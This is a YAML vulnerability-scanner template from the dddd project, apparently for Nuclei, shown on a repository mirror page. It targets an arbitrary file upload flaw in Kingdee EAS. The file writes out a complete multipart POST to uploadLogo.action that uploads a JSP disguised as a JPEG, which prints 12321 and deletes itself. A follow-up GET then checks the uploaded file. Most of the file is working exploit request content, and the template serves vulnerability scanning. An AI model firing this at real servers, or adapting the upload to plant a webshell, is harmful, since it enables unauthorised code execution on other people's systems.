admin/dddd
1
0
Fork 0
mirror of https://github.com/SleepingBag945/dddd.git synced 2025-06-10 02:03:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
dddd/common/config/pocs/kingdee-eas-uploadlogo-fileupload.yaml
SleepingBag945 9a83a1b39f dddd v2.0
2024-04-03 06:32:26 +02:00

63 lines
2.0 KiB
YAML
Raw Blame History

id: kingdee-eas-uploadlogo-fileupload
info:
name: 金蝶EAS uploadlogo 任意文件上传
author: SleepingBag945
severity: critical
http:
- raw:
- |
POST /plt_portal/setting/uploadLogo.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycxkT8bV6WLIUzm2p
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="chooseLanguage_top"
ch
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="dataCenter"
xx
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="insId"
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="type"
top
------WebKitFormBoundarycxkT8bV6WLIUzm2p
Content-Disposition: form-data; name="upload"; filename=1111.jsp
Content-Type: image/jpeg
<% out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundarycxkT8bV6WLIUzm2p--
- |
GET /portal/res/file/upload/{{path}}.jsp HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: path
part: body_1
internal: true
group: 1
regex:
- '"topLogo","(.*?).jsp"'
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_1,"topLogo",".jsp")
- status_code_2 == 200 && contains(body_2,"12321")
condition: and
Reference in New Issue View Git Blame Copy Permalink